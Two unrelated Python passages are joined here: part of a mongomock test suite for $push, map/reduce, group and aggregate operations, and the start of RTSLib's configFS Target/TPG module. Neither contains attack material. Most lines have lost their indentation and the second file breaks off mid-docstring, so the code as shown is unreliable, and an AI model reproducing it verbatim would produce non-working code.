self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': 'wide'}})
self.cmp.compare.find({'name': 'bob'})
def test__push_dict(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': ['L', 'XL']}]})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': {'name': 'cap', 'sizes': ['S', 'L']}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': ['green', 'tall']})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': {'$each': ['wide', 'blue']}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_dict(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': [{'size': 'L', 'quantity': 3}, {'size': 'XL', 'quantity': 4}], 'colors': ['green', 'blue']}, {'name': 'cap', 'sizes': [{'size': 'S', 'quantity': 10}, {'size': 'L', 'quantity': 5}], 'colors': ['blue']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$push': {'hat.$.sizes': {'size': 'M', 'quantity': 6}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_dict_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': [{'size': 'L', 'quantity': 3}, {'size': 'XL', 'quantity': 4}], 'colors': ['green', 'blue']}, {'name': 'cap', 'sizes': [{'size': 'S', 'quantity': 10}, {'size': 'L', 'quantity': 5}], 'colors': ['blue']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$push': {'hat.$.sizes': {'$each': [{'size': 'M', 'quantity': 6}, {'size': 'S', 'quantity': 1}]}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_list_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': [{'name': 'derby', 'sizes': ['L', 'XL'], 'colors': ['green', 'blue']}, {'name': 'cap', 'sizes': ['S', 'L'], 'colors': ['blue']}]})
self.cmp.do.update({'hat': {'$elemMatch': {'name': 'derby'}}}, {'$push': {'hat.$.sizes': {'$each': ['M', 'S']}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_attribute(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': {'data': {'sizes': ['XL']}}})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat.data.sizes': 'L'}})
self.cmp.compare.find({'name': 'bob'})
def test__push_nested_attribute_each(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob', 'hat': {}})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat.first': {'$each': ['a', 'b']}}})
self.cmp.compare.find({'name': 'bob'})
def test__push_to_absent_nested_attribute(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat.data.sizes': 'L'}})
self.cmp.compare.find({'name': 'bob'})
def test__push_to_absent_field(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': 'wide'}})
self.cmp.compare.find({'name': 'bob'})
def test__push_each_to_absent_field(self):
self.cmp.do.remove()
self.cmp.do.insert({'name': 'bob'})
self.cmp.do.update({'name': 'bob'}, {'$push': {'hat': {'$each': ['wide', 'blue']}}})
self.cmp.compare.find({'name': 'bob'})
def test__drop(self):
self.cmp.do.insert({"name" : "another new"})
self.cmp.do.drop()
self.cmp.compare.find({})
def test__ensure_index(self):
# Does nothing - just make sure it exists and takes the right args
self.cmp.do.ensure_index("name")
self.cmp.do.ensure_index("hat", cache_for = 100)
self.cmp.do.ensure_index([("name", 1), ("hat", -1)])
def test__drop_index(self):
# Does nothing - just make sure it exists and takes the right args
self.cmp.do.drop_index("name")
def test__index_information(self):
# Does nothing - just make sure it exists
self.cmp.do.index_information()
class MongoClientCollectionTest(_CollectionTest, _MongoClientMixin):
pass
class PymongoCollectionTest(_CollectionTest, _PymongoConnectionMixin):
pass
@skipIf(not _HAVE_PYMONGO, "pymongo not installed")
@skipIf(not _HAVE_MAP_REDUCE, "execjs not installed")
class CollectionMapReduceTest(TestCase):
def setUp(self):
self.db = mongomock.Connection().map_reduce_test
self.data = [{"x": 1, "tags": ["dog", "cat"]},
{"x": 2, "tags": ["cat"]},
{"x": 3, "tags": ["mouse", "cat", "dog"]},
{"x": 4, "tags": []}]
for item in self.data:
self.db.things.insert(item)
self.map_func = Code("""
function() {
this.tags.forEach(function(z) {
emit(z, 1);
});
}""")
self.reduce_func = Code("""
function(key, values) {
var total = 0;
for(var i = 0; i<values.length; i++) {
total += values[i];
}
return total;
}""")
self.expected_results = [{'_id': 'mouse', 'value': 1},
{'_id': 'dog', 'value': 2},
{'_id': 'cat', 'value': 3}]
def test__map_reduce(self):
self._check_map_reduce(self.db.things, self.expected_results)
def test__map_reduce_clean_res_colc(self):
# Checks that the result collection is cleaned between calls.
self._check_map_reduce(self.db.things, self.expected_results)
more_data = [{"x": 1, "tags": []},
{"x": 2, "tags": []},
{"x": 3, "tags": []},
{"x": 4, "tags": []}]
for item in more_data:
self.db.more_things.insert(item)
expected_results = []
self._check_map_reduce(self.db.more_things, expected_results)
def _check_map_reduce(self, colc, expected_results):
result = colc.map_reduce(self.map_func, self.reduce_func, 'myresults')
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'myresults')
self.assertEqual(result.count(), len(expected_results))
for doc in result.find():
self.assertIn(doc, expected_results)
def test__map_reduce_son(self):
result = self.db.things.map_reduce(self.map_func, self.reduce_func, out=SON([('replace', 'results'), ('db', 'map_reduce_son_test')]))
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'results')
self.assertEqual(result._Collection__database.name, 'map_reduce_son_test')
self.assertEqual(result.count(), 3)
for doc in result.find():
self.assertIn(doc, self.expected_results)
def test__map_reduce_full_response(self):
expected_full_response = {'counts': {'input': 4, 'reduce': 2, 'emit': 6, 'output': 3}, 'timeMillis': 5, 'ok': 1.0, 'result': 'myresults'}
result = self.db.things.map_reduce(self.map_func, self.reduce_func, 'myresults', full_response=True)
self.assertTrue(isinstance(result, dict))
self.assertEqual(result['counts'], expected_full_response['counts'])
self.assertEqual(result['result'], expected_full_response['result'])
for doc in getattr(self.db, result['result']).find():
self.assertIn(doc, self.expected_results)
def test__map_reduce_with_query(self):
expected_results = [{'_id': 'mouse', 'value': 1},
{'_id': 'dog', 'value': 2},
{'_id': 'cat', 'value': 2}]
result = self.db.things.map_reduce(self.map_func, self.reduce_func, 'myresults', query={'tags': 'dog'})
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'myresults')
self.assertEqual(result.count(), 3)
for doc in result.find():
self.assertIn(doc, expected_results)
def test__map_reduce_with_limit(self):
result = self.db.things.map_reduce(self.map_func, self.reduce_func, 'myresults', limit=2)
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'myresults')
self.assertEqual(result.count(), 2)
def test__inline_map_reduce(self):
result = self.db.things.inline_map_reduce(self.map_func, self.reduce_func)
self.assertTrue(isinstance(result, list))
self.assertEqual(len(result), 3)
for doc in result:
self.assertIn(doc, self.expected_results)
def test__inline_map_reduce_full_response(self):
expected_full_response = {'counts': {'input': 4, 'reduce': 2, 'emit': 6, 'output': 3}, 'timeMillis': 5, 'ok': 1.0, 'result': [{'_id': 'cat', 'value': 3}, {'_id': 'dog', 'value': 2}, {'_id': 'mouse', 'value': 1}]}
result = self.db.things.inline_map_reduce(self.map_func, self.reduce_func, full_response=True)
self.assertTrue(isinstance(result, dict))
self.assertEqual(result['counts'], expected_full_response['counts'])
for doc in result['result']:
self.assertIn(doc, self.expected_results)
def test__map_reduce_with_object_id(self):
obj1 = ObjectId()
obj2 = ObjectId()
data = [{"x": 1, "tags": [obj1, obj2]},
{"x": 2, "tags": [obj1]}]
for item in data:
self.db.things_with_obj.insert(item)
expected_results = [{'_id': obj1, 'value': 2},
{'_id': obj2, 'value': 1}]
result = self.db.things_with_obj.map_reduce(self.map_func, self.reduce_func, 'myresults')
self.assertTrue(isinstance(result, mongomock.Collection))
self.assertEqual(result.name, 'myresults')
self.assertEqual(result.count(), 2)
for doc in result.find():
self.assertIn(doc, expected_results)
@skipIf(not _HAVE_PYMONGO, "pymongo not installed")
@skipIf(not _HAVE_MAP_REDUCE, "execjs not installed")
class _GroupTest(_CollectionComparisonTest):
def setUp(self):
_CollectionComparisonTest.setUp(self)
self._id1 = ObjectId()
self.data = [
{"a": 1, "count": 4 },
{"a": 1, "count": 2 },
{"a": 1, "count": 4 },
{"a": 2, "count": 3 },
{"a": 2, "count": 1 },
{"a": 1, "count": 5 },
{"a": 4, "count": 4 },
{"b": 4, "foo": 4 },
{"b": 2, "foo": 3, "name":"theone" },
{"b": 1, "foo": 2 },
{"b": 1, "foo": self._id1 },
]
for item in self.data:
self.cmp.do.insert(item)
def test__group1(self):
key = ["a"]
initial = {"count":0}
condition = {"a": {"$lt": 3}}
reduce_func = Code("""
function(cur, result) { result.count += cur.count }
""")
self.cmp.compare.group(key, condition, initial, reduce_func)
def test__group2(self):
reduce_func = Code("""
function(cur, result) { result.count += 1 }
""")
self.cmp.compare.group(key=["b"],
condition={"foo": {"$in": [3, 4]}, "name": "theone"},
initial={"count": 0},
reduce=reduce_func)
def test__group3(self):
reducer = Code("""
function(obj, result) { result.count += 1 }
""")
conditions = {
'foo': {'$in': [self._id1]},
}
self.cmp.compare.group(key=['foo'],
condition=conditions,
initial={"count": 0},
reduce=reducer)
class MongoClientGroupTest(_GroupTest, _MongoClientMixin):
pass
class PymongoGroupTest(_GroupTest, _PymongoConnectionMixin):
pass
@skipIf(not _HAVE_PYMONGO, "pymongo not installed")
@skipIf(not _HAVE_MAP_REDUCE, "execjs not installed")
class _AggregateTest(_CollectionComparisonTest):
def setUp(self):
_CollectionComparisonTest.setUp(self)
self.data = [{"_id":ObjectId(), "a": 1, "count": 4, "swallows":['European swallow'] },
{"_id":ObjectId(), "a": 1, "count": 2, "swallows":['African swallow'] },
{"_id":ObjectId(), "a": 1, "count": 4, "swallows":['European swallow'] },
{"_id":ObjectId(), "a": 2, "count": 3, "swallows":['African swallow', 'European swallow'] },
{"_id":ObjectId(), "a": 2, "count": 1, "swallows":[] },
{"_id":ObjectId(), "a": 1, "count": 5, "swallows":['African swallow', 'European swallow'] },
{"_id":ObjectId(), "a": 4, "count": 4, "swallows":['unladen swallow'] }]
for item in self.data:
self.cmp.do.insert(item)
def test__aggregate1(self):
pipeline = [
{
'$match': {'a':{'$lt':3}}
},
{
'$sort':{'_id':-1}
},
]
self.cmp.compare.aggregate(pipeline)
def test__aggregate2(self):
pipeline = [
{
'$group': {
'_id': '$a',
'count': {'$sum': '$count'}
}
},
{
'$match': {'a':{'$lt':3}}
},
{
'$sort': {'_id': -1, 'count': 1}
},
]
self.cmp.compare.aggregate(pipeline)
def test__aggregate3(self):
pipeline = [{'$group': {'_id': 'a',
'count': {'$sum': '$count'}}},
{'$match': {'a':{'$lt':3}}},
{'$sort': {'_id': -1, 'count': 1}},
{'$skip': 1},
{'$limit': 2}]
self.cmp.compare.aggregate(pipeline)
def test__aggregate4(self):
pipeline = [{'$unwind': '$swallows'}
, {'$sort': {'count':-1, 'swallows': -1}}
]
self.cmp.compare.aggregate(pipeline)
class MongoClientAggregateTest(_AggregateTest, _MongoClientMixin):
pass
class PymongoAggregateTest(_AggregateTest, _PymongoConnectionMixin):
pass
def _LIMIT(*args):
return lambda cursor: cursor.limit(*args)
def _SORT(*args):
return lambda cursor: cursor.sort(*args)
def _SKIP(*args):
return lambda cursor: cursor.skip(*args)
class _SortSkipLimitTest(_CollectionComparisonTest):
def setUp(self):
super(_SortSkipLimitTest, self).setUp()
self.cmp.do.insert([{"_id":i, "index" : i} for i in range(30)])
def test__skip(self):
self.cmp.compare(_SORT("index", 1), _SKIP(10)).find()
def test__limit(self):
self.cmp.compare(_SORT("index", 1), _LIMIT(10)).find()
def test__skip_and_limit(self):
self.cmp.compare(_SORT("index", 1), _SKIP(10), _LIMIT(10)).find()
def test__sort_name(self):
self.cmp.do.remove()
for data in ({"a" : 1, "b" : 3, "c" : "data1"},
{"a" : 2, "b" : 2, "c" : "data3"},
{"a" : 3, "b" : 1, "c" : "data2"}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT("a")).find()
self.cmp.compare(_SORT("b")).find()
def test__sort_name_nested_doc(self):
self.cmp.do.remove()
for data in ({"root": {"a" : 1, "b" : 3, "c" : "data1"}},
{"root": {"a" : 2, "b" : 2, "c" : "data3"}},
{"root": {"a" : 3, "b" : 1, "c" : "data2"}}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT("root.a")).find()
self.cmp.compare(_SORT("root.b")).find()
def test__sort_name_nested_list(self):
self.cmp.do.remove()
for data in ({"root": [{"a" : 1, "b" : 3, "c" : "data1"}]},
{"root": [{"a" : 2, "b" : 2, "c" : "data3"}]},
{"root": [{"a" : 3, "b" : 1, "c" : "data2"}]}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT("root.0.a")).find()
self.cmp.compare(_SORT("root.0.b")).find()
def test__sort_list(self):
self.cmp.do.remove()
for data in ({"a" : 1, "b" : 3, "c" : "data1"},
{"a" : 2, "b" : 2, "c" : "data3"},
{"a" : 3, "b" : 1, "c" : "data2"}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT([("a", 1), ("b", -1)])).find()
self.cmp.compare(_SORT([("b", 1), ("a", -1)])).find()
self.cmp.compare(_SORT([("b", 1), ("a", -1), ("c", 1)])).find()
def test__sort_list_nested_doc(self):
self.cmp.do.remove()
for data in ({"root": {"a" : 1, "b" : 3, "c" : "data1"}},
{"root": {"a" : 2, "b" : 2, "c" : "data3"}},
{"root": {"a" : 3, "b" : 1, "c" : "data2"}}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT([("root.a", 1), ("root.b", -1)])).find()
self.cmp.compare(_SORT([("root.b", 1), ("root.a", -1)])).find()
self.cmp.compare(_SORT([("root.b", 1), ("root.a", -1), ("root.c", 1)])).find()
def test__sort_list_nested_list(self):
self.cmp.do.remove()
for data in ({"root": [{"a" : 1, "b" : 3, "c" : "data1"}]},
{"root": [{"a" : 2, "b" : 2, "c" : "data3"}]},
{"root": [{"a" : 3, "b" : 1, "c" : "data2"}]}):
self.cmp.do.insert(data)
self.cmp.compare(_SORT([("root.0.a", 1), ("root.0.b", -1)])).find()
self.cmp.compare(_SORT([("root.0.b", 1), ("root.0.a", -1)])).find()
self.cmp.compare(_SORT([("root.0.b", 1), ("root.0.a", -1), ("root.0.c", 1)])).find()
def test__close(self):
# Does nothing - just make sure it exists and takes the right args
self.cmp.do(lambda cursor: cursor.close()).find()
class MongoClientSortSkipLimitTest(_SortSkipLimitTest, _MongoClientMixin):
pass
class PymongoConnectionSortSkipLimitTest(_SortSkipLimitTest, _PymongoConnectionMixin):
pass
class InsertedDocumentTest(TestCase):
def setUp(self):
super(InsertedDocumentTest, self).setUp()
self.collection = mongomock.Connection().db.collection
self.data = {"a" : 1, "b" : [1, 2, 3], "c" : {"d" : 4}}
self.orig_data = copy.deepcopy(self.data)
self.object_id = self.collection.insert(self.data)
def test__object_is_consistent(self):
[object] = self.collection.find()
self.assertEquals(object["_id"], self.object_id)
def test__find_by_id(self):
[object] = self.collection.find({"_id" : self.object_id})
self.assertEquals(object, self.data)
def test__remove_by_id(self):
self.collection.remove(self.object_id)
self.assertEqual(0, self.collection.count())
def test__inserting_changes_argument(self):
# Like pymongo, we should fill the _id in the inserted dict (odd behavior, but we need to stick to it).
self.assertEquals(self.data, dict(self.orig_data, _id=self.object_id))
def test__data_is_copied(self):
[object] = self.collection.find()
self.assertEquals(dict(self.orig_data, _id=self.object_id), object)
self.data.pop("a")
self.data["b"].append(5)
self.assertEquals(dict(self.orig_data, _id=self.object_id), object)
[object] = self.collection.find()
self.assertEquals(dict(self.orig_data, _id=self.object_id), object)
def test__find_returns_copied_object(self):
[object1] = self.collection.find()
[object2] = self.collection.find()
self.assertEquals(object1, object2)
self.assertIsNot(object1, object2)
object1["b"].append("bla")
self.assertNotEquals(object1, object2)
class ObjectIdTest(TestCase):
def test__equal_with_same_id(self):
obj1 = ObjectId()
obj2 = ObjectId(str(obj1))
self.assertEqual(obj1, obj2)
class DatabasesNamesTest(TestCase):
def setUp(self):
super(DatabasesNamesTest, self).setUp()
self.conn = mongomock.Connection()
def test__database_names(self):
self.conn.unit.tests.insert({'foo': 'bar'})
self.conn.foo.bar.insert({'unit': 'test'})
names = self.conn.database_names()
self.assertIsInstance(names, list)
self.assertEquals(sorted(['foo', 'unit']), sorted(names))
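# Illustrative sketch (not part of the test suite above): the bare
# map/reduce round trip those tests exercise, written standalone. It
# assumes bson's Code and mongomock are importable, as elsewhere in this
# module.
def _example_mongomock_map_reduce():
    db = mongomock.Connection().demo_db
    db.words.insert({'tags': ['cat', 'dog']})
    db.words.insert({'tags': ['cat']})
    map_func = Code("function() { this.tags.forEach(function(t) { emit(t, 1); }); }")
    reduce_func = Code("function(key, values) { return Array.sum(values); }")
    # Returns a mongomock.Collection named 'word_counts' holding
    # {'_id': 'cat', 'value': 2} and {'_id': 'dog', 'value': 1}.
    return db.words.map_reduce(map_func, reduce_func, 'word_counts')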
|
|
'''
Implements the RTS generic Target fabric classes.
This file is part of RTSLib.
Copyright (c) 2011-2013 by Datera, Inc.
Copyright (c) 2011-2014 by Red Hat, Inc.
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
License for the specific language governing permissions and limitations
under the License.
'''
import os
from glob import iglob as glob
from functools import partial
from six.moves import range
import uuid
from .node import CFSNode
from .utils import RTSLibBrokenLink, RTSLibError
from .utils import fread, fwrite, normalize_wwn, generate_wwn
from .utils import dict_remove, set_attributes, set_parameters, ignored
from .utils import _get_auth_attr, _set_auth_attr
from . import tcm
import six
auth_params = ('userid', 'password', 'mutual_userid', 'mutual_password')
class Target(CFSNode):
'''
This is an interface to Targets in configFS.
A Target is identified by its wwn.
To a Target is attached a list of TPG objects.
'''
# Target private stuff
def __repr__(self):
return "<Target %s/%s>" % (self.fabric_module.name, self.wwn)
def __init__(self, fabric_module, wwn=None, mode='any'):
'''
@param fabric_module: The target's fabric module.
@type fabric_module: FabricModule
@param wwn: The optional Target's wwn.
If no wwn is specified, one will be generated.
@type wwn: string
@param mode: An optional string containing the object creation mode:
- I{'any'} means the configFS object will be either looked up
or created.
- I{'lookup'} means the object MUST already exist in configFS.
- I{'create'} means the object must NOT already exist in configFS.
@type mode: string
@return: A Target object.
'''
super(Target, self).__init__()
self.fabric_module = fabric_module
fabric_module._check_self()
if wwn is not None:
# old versions used wrong NAA prefix, fixup
if wwn.startswith("naa.6"):
wwn = "naa.5" + wwn[5:]
self.wwn, self.wwn_type = fabric_module.to_normalized_wwn(wwn)
elif not fabric_module.wwns:
self.wwn = generate_wwn(fabric_module.wwn_types[0])
self.wwn_type = fabric_module.wwn_types[0]
else:
raise RTSLibError("Fabric cannot generate WWN but it was not given")
# Checking is done, convert to format the fabric wants
fabric_wwn = fabric_module.to_fabric_wwn(self.wwn)
self._path = "%s/%s" % (self.fabric_module.path, fabric_wwn)
self._create_in_cfs_ine(mode)
def _list_tpgs(self):
self._check_self()
for tpg_dir in glob("%s/tpgt*" % self.path):
tag = os.path.basename(tpg_dir).split('_')[1]
tag = int(tag)
yield TPG(self, tag, 'lookup')
# Target public stuff
def has_feature(self, feature):
'''
Whether or not this Target has a certain feature.
'''
return self.fabric_module.has_feature(feature)
def delete(self):
'''
Recursively deletes a Target object.
This will delete all attached TPG objects and then the Target itself.
'''
self._check_self()
for tpg in self.tpgs:
tpg.delete()
super(Target, self).delete()
tpgs = property(_list_tpgs, doc="Get the list of TPG for the Target.")
@classmethod
def setup(cls, fm_obj, t, err_func):
'''
Set up target objects based upon t dict, from saved config.
Guard against missing or bad dict items, but keep going.
Call 'err_func' for each error.
'''
if 'wwn' not in t:
err_func("'wwn' not defined for Target")
return
try:
t_obj = Target(fm_obj, t['wwn'])
except RTSLibError as e:
err_func("Could not create Target object: %s" % e)
return
for tpg in t.get('tpgs', []):
TPG.setup(t_obj, tpg, err_func)
def dump(self):
d = super(Target, self).dump()
d['wwn'] = self.wwn
d['fabric'] = self.fabric_module.name
d['tpgs'] = [tpg.dump() for tpg in self.tpgs]
return d
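# Illustrative sketch (not part of the module proper): rebuilding a Target
# from a dict previously produced by dump(). `fabric` is assumed to be an
# already-instantiated fabric module object; errors are collected by the
# err_func callback instead of being raised.
def _example_restore_target(fabric, saved_target):
    errors = []
    Target.setup(fabric, saved_target, errors.append)
    return errors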
class TPG(CFSNode):
'''
This is an interface to Target Portal Groups in configFS.
A TPG is identified by its parent Target object and its TPG Tag.
To a TPG object is attached a list of NetworkPortals. Targets without
the 'tpgts' feature cannot have more than a single TPG, so attempts
to create more will raise an exception.
'''
# TPG private stuff
def __repr__(self):
return "<TPG %d>" % self.tag
def __init__(self, parent_target, tag=None, mode='any'):
'''
@param parent_target: The parent Target object of the TPG.
@type parent_target: Target
@param tag: The TPG Tag (TPGT).
@type tag: int > 0
@param mode: An optional string containing the object creation mode:
- I{'any'} means the configFS object will be either looked up or
created.
- I{'lookup'} means the object MUST already exist in configFS.
- I{'create'} means the object must NOT already exist in configFS.
@type mode: string
@return: A TPG object.
'''
super(TPG, self).__init__()
if tag is None:
tags = [tpg.tag for tpg in parent_target.tpgs]
for index in range(1048576):
if index not in tags and index > 0:
tag = index
break
if tag is None:
raise RTSLibError("Cannot find an available TPG Tag")
else:
tag = int(tag)
if not tag > 0:
raise RTSLibError("The TPG Tag must be >0")
self._tag = tag
if isinstance(parent_target, Target):
self._parent_target = parent_target
else:
raise RTSLibError("Invalid parent Target")
self._path = "%s/tpgt_%d" % (self.parent_target.path, self.tag)
target_path = self.parent_target.path
if not self.has_feature('tpgts') and not os.path.isdir(self._path):
for filename in os.listdir(target_path):
if filename.startswith("tpgt_") \
and os.path.isdir("%s/%s" % (target_path, filename)) \
and filename != "tpgt_%d" % self.tag:
raise RTSLibError("Target cannot have multiple TPGs")
self._create_in_cfs_ine(mode)
if self.has_feature('nexus') and not self._get_nexus():
self._set_nexus()
def _get_tag(self):
return self._tag
def _get_parent_target(self):
return self._parent_target
def _list_network_portals(self):
self._check_self()
if not self.has_feature('nps'):
return
for network_portal_dir in os.listdir("%s/np" % self.path):
(ip_address, port) = \
os.path.basename(network_portal_dir).rsplit(":", 1)
port = int(port)
yield NetworkPortal(self, ip_address, port, 'lookup')
def _get_enable(self):
self._check_self()
path = "%s/enable" % self.path
# If the TPG does not have the enable attribute, then it is always
# enabled.
if os.path.isfile(path):
return bool(int(fread(path)))
else:
return True
def _set_enable(self, boolean):
'''
Enables or disables the TPG. If the TPG doesn't support the enable
attribute, do nothing.
'''
self._check_self()
path = "%s/enable" % self.path
if os.path.isfile(path) and (boolean != self._get_enable()):
try:
fwrite(path, str(int(boolean)))
except IOError as e:
raise RTSLibError("Cannot change enable state: %s" % e)
def _get_nexus(self):
'''
Gets the nexus initiator WWN, or None if the TPG does not have one.
'''
self._check_self()
if self.has_feature('nexus'):
try:
nexus_wwn = fread("%s/nexus" % self.path)
except IOError:
nexus_wwn = ''
return nexus_wwn
else:
return None
def _set_nexus(self, nexus_wwn=None):
'''
Sets the nexus initiator WWN. Raises an exception if the nexus is
already set or if the TPG does not use a nexus.
'''
self._check_self()
if not self.has_feature('nexus'):
raise RTSLibError("The TPG does not use a nexus")
if self._get_nexus():
raise RTSLibError("The TPG's nexus initiator WWN is already set")
fm = self.parent_target.fabric_module
if nexus_wwn:
nexus_wwn = fm.to_normalized_wwn(nexus_wwn)[0]
else:
# Nexus wwn type should match parent target
nexus_wwn = generate_wwn(self.parent_target.wwn_type)
fwrite("%s/nexus" % self.path, fm.to_fabric_wwn(nexus_wwn))
def _list_node_acls(self):
self._check_self()
if not self.has_feature('acls'):
return
node_acl_dirs = [os.path.basename(path)
for path in os.listdir("%s/acls" % self.path)]
for node_acl_dir in node_acl_dirs:
fm = self.parent_target.fabric_module
yield NodeACL(self, fm.from_fabric_wwn(node_acl_dir), 'lookup')
def _list_node_acl_groups(self):
self._check_self()
if not self.has_feature('acls'):
return
names = set([])
for na in self.node_acls:
tag = na.tag
if tag:
names.add(tag)
return (NodeACLGroup(self, n) for n in names)
def _list_luns(self):
self._check_self()
lun_dirs = [os.path.basename(path)
for path in os.listdir("%s/lun" % self.path)]
for lun_dir in lun_dirs:
lun = lun_dir.split('_')[1]
lun = int(lun)
yield LUN(self, lun)
def _control(self, command):
self._check_self()
path = "%s/control" % self.path
fwrite(path, "%s\n" % str(command))
# TPG public stuff
def has_feature(self, feature):
'''
Whether or not this TPG has a certain feature.
'''
return self.parent_target.has_feature(feature)
def delete(self):
'''
Recursively deletes a TPG object.
This will delete all attached LUN, NetworkPortal and Node ACL objects
and then the TPG itself. Before starting the actual deletion process,
all sessions will be disconnected.
'''
self._check_self()
self.enable = False
for acl in self.node_acls:
acl.delete()
for lun in self.luns:
lun.delete()
for portal in self.network_portals:
portal.delete()
super(TPG, self).delete()
def node_acl(self, node_wwn, mode='any'):
'''
Same as NodeACL() but without specifying the parent_tpg.
'''
self._check_self()
return NodeACL(self, node_wwn=node_wwn, mode=mode)
def network_portal(self, ip_address, port, mode='any'):
'''
Same as NetworkPortal() but without specifying the parent_tpg.
'''
self._check_self()
return NetworkPortal(self, ip_address=ip_address, port=port, mode=mode)
def lun(self, lun, storage_object=None, alias=None):
'''
Same as LUN() but without specifying the parent_tpg.
'''
self._check_self()
return LUN(self, lun=lun, storage_object=storage_object, alias=alias)
tag = property(_get_tag,
doc="Get the TPG Tag as an int.")
parent_target = property(_get_parent_target,
doc="Get the parent Target object to which the " \
+ "TPG is attached.")
enable = property(_get_enable, _set_enable,
doc="Get or set a boolean value representing the " \
+ "enable status of the TPG. " \
+ "True means the TPG is enabled, False means it is " \
+ "disabled.")
network_portals = property(_list_network_portals,
doc="Get the list of NetworkPortal objects currently attached " \
+ "to the TPG.")
node_acls = property(_list_node_acls,
doc="Get the list of NodeACL objects currently " \
+ "attached to the TPG.")
node_acl_groups = property(_list_node_acl_groups,
doc="Get the list of NodeACL groups currently " \
+ "attached to the TPG.")
luns = property(_list_luns,
doc="Get the list of LUN objects currently attached " \
+ "to the TPG.")
nexus = property(_get_nexus, _set_nexus,
doc="Get or set (once) the TPG's Nexus is used.")
chap_userid = property(partial(_get_auth_attr, attribute='auth/userid', ignore=True),
partial(_set_auth_attr, attribute='auth/userid', ignore=True),
doc="Set or get the initiator CHAP auth userid.")
chap_password = property(partial(_get_auth_attr, attribute='auth/password', ignore=True),
partial(_set_auth_attr, attribute='auth/password', ignore=True),
doc="Set or get the initiator CHAP auth password.")
chap_mutual_userid = property(partial(_get_auth_attr, attribute='auth/userid_mutual', ignore=True),
partial(_set_auth_attr, attribute='auth/userid_mutual', ignore=True),
doc="Set or get the initiator CHAP auth userid.")
chap_mutual_password = property(partial(_get_auth_attr, attribute='auth/password_mutual', ignore=True),
partial(_set_auth_attr, attribute='auth/password_mutual', ignore=True),
doc="Set or get the initiator CHAP auth password.")
def _get_authenticate_target(self):
self._check_self()
path = "%s/auth/authenticate_target" % self.path
try:
return bool(int(fread(path)))
except (IOError, ValueError):
return None
authenticate_target = property(_get_authenticate_target,
doc="Get the boolean authenticate target flag.")
@classmethod
def setup(cls, t_obj, tpg, err_func):
tpg_obj = cls(t_obj, tag=tpg.get("tag", None))
set_attributes(tpg_obj, tpg.get('attributes', {}), err_func)
set_parameters(tpg_obj, tpg.get('parameters', {}), err_func)
for lun in tpg.get('luns', []):
LUN.setup(tpg_obj, lun, err_func)
for p in tpg.get('portals', []):
NetworkPortal.setup(tpg_obj, p, err_func)
for acl in tpg.get('node_acls', []):
NodeACL.setup(tpg_obj, acl, err_func)
tpg_obj.enable = tpg.get('enable', True)
dict_remove(tpg, ('luns', 'portals', 'node_acls', 'tag',
'attributes', 'parameters', 'enable'))
for name, value in six.iteritems(tpg):
if value:
try:
setattr(tpg_obj, name, value)
except Exception:
err_func("Could not set tpg %s attribute '%s'" %
(tpg_obj.tag, name))
def dump(self):
d = super(TPG, self).dump()
d['tag'] = self.tag
d['enable'] = self.enable
d['luns'] = [lun.dump() for lun in self.luns]
d['portals'] = [portal.dump() for portal in self.network_portals]
d['node_acls'] = [acl.dump() for acl in self.node_acls]
if self.has_feature("auth"):
for attr in auth_params:
val = getattr(self, "chap_" + attr, None)
if val:
d["chap_" + attr] = val
return d
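# Illustrative sketch: minimal TPG bring-up on an existing Target. The tag
# is auto-allocated when omitted, and setting enable is a no-op on fabrics
# that lack the enable attribute.
def _example_create_tpg(target):
    tpg = TPG(target, mode='create')
    tpg.enable = True
    return tpg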
class LUN(CFSNode):
'''
This is an interface to RTS Target LUNs in configFS.
A LUN is identified by its parent TPG and LUN index.
'''
MAX_LUN = 255
# LUN private stuff
def __repr__(self):
return "<LUN %d (%s/%s)>" % (self.lun, self.storage_object.plugin,
self.storage_object.name)
def __init__(self, parent_tpg, lun=None, storage_object=None, alias=None):
'''
A LUN object can be instantiated in two ways:
- B{Creation mode}: If I{storage_object} is specified, the
underlying configFS object will be created with that parameter.
No LUN with the same I{lun} index can pre-exist in the parent TPG
in that mode, or instantiation will fail.
- B{Lookup mode}: If I{storage_object} is not set, then the LUN
